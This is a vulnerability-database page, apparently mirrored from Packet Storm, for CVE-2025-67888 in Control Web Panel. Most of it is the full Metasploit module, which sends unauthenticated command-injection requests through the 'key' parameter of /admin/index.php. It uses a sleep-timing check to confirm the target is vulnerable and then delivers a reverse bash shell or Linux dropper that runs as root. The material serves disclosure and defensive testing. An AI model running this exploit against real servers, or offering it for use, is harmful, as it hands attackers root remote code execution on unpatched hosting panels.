📄 Control Web Panel 0.9.8.1208 Remote Code Execution

🗓️ 14 Jan 2026 00:00:00Reported by Lukas Johannes Möller, EgiXType

packetstorm🔗 packetstorm.news👁 167 Views

CWP <=0.9.8.1208 enables unauthenticated OS command injection via key in /admin/index.php when api set; needs Softaculous or SitePad.

Reporter	Title	Published	Views	Family All 13
ATTACKERKB	CVE-2025-67888	8 May 202600:00	–	attackerkb
Circl	CVE-2025-67888	18 Dec 202515:00	–	circl
CNNVD	Control Web Panel 操作系统命令注入漏洞	8 May 202600:00	–	cnnvd
CVE	CVE-2025-67888	8 May 202600:00	–	cve
Cvelist	CVE-2025-67888	8 May 202600:00	–	cvelist
EUVD	EUVD-2025-209736	8 May 202609:31	–	euvd
Metasploit	Control Web Panel /admin/index.php Unauthenticated RCE	14 Jan 202618:54	–	metasploit
NVD	CVE-2025-67888	8 May 202607:16	–	nvd
Packet Storm	📄 Control Web Panel 0.9.8.1208 Command Injection	16 Dec 202500:00	–	packetstorm
Positive Technologies	PT-2026-38670	8 May 202600:00	–	ptsecurity

##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Control Web Panel /admin/index.php Unauthenticated RCE',
            'Description' => %q{
              Control Web Panel (CWP) versions <= 0.9.8.1208 are vulnerable to
              unauthenticated OS command injection. User input passed via the
              "key" GET parameter to /admin/index.php (when the "api" parameter is set)
              is not properly sanitized before being used to execute OS commands.
              This can be exploited by unauthenticated attackers to inject and execute
              arbitrary OS commands with the privileges of the root user on the web server.
    
              Successful exploitation usually requires "Softaculous" and/or "SitePad"
              to be installed through the Scripts Manager.
            },
            'Author' => [
              'Lukas Johannes Möller', # Metasploit module
              'Egidio Romano' # Vulnerability discovery
            ],
            'References' => [
              ['CVE', '2025-67888'],
              ['URL', 'https://karmainsecurity.com/KIS-2025-09'],
              ['URL', 'https://www.cve.org/CVERecord?id=CVE-2025-67888'],
              ['URL', 'https://control-webpanel.com']
            ],
            'DisclosureDate' => '2025-12-16',
            'License' => MSF_LICENSE,
            'Platform' => ['linux', 'unix'],
            'Arch' => ARCH_ALL,
            'Privileged' => true,
            'Targets' => [
              [
                'Unix Command',
                {
                  'Platform' => 'unix',
                  'Arch' => ARCH_ALL,
                  'DefaultOptions' => {
                    'PAYLOAD' => 'cmd/unix/reverse_bash'
                  },
                  'Payload' => {
                    'Encoder' => 'cmd/base64',
                    'BadChars' => "\x00\x20"
                  }
                }
              ],
              [
                'Linux Dropper',
                {
                  'Platform' => 'linux',
                  'Arch' => ARCH_ALL
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'SSL' => true
            },
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
    
        register_options([
          Opt::RPORT(2031)
        ])
      end
    
      def check
        sleep_time = rand(5..10)
    
        print_status("Checking vulnerability with sleep command (waiting #{sleep_time} seconds)...")
    
        res, elapsed_time = Rex::Stopwatch.elapsed_time do
          send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri('/admin/index.php'),
            'vars_get' => {
              'api' => '1',
              'key' => "$(sleep #{sleep_time})"
            }
          )
        end
    
        vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds")
    
        return CheckCode::Unknown('No response from server.') unless res
        return CheckCode::Vulnerable("Server waited #{elapsed_time.round(2)} seconds (expected >= #{sleep_time}).") if elapsed_time >= sleep_time
    
        CheckCode::Safe("Server responded in #{elapsed_time.round(2)} seconds (expected >= #{sleep_time}).")
      end
    
      def exploit
        print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    
        case target['Type']
        when :unix_cmd
          execute_command(payload.encoded)
        when :linux_dropper
          execute_cmdstager
        end
      end
    
      def execute_command(cmd, _opts = {})
        vprint_status("Executing command: #{cmd}")
    
        send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri('/admin/index.php'),
          'vars_get' => {
            'api' => '1',
            'key' => "$(#{cmd})"
          }
        )
      end
    end

14 Jan 2026 00:00Current

8.1High risk

Vulners AI Score8.1

EPSS0.01186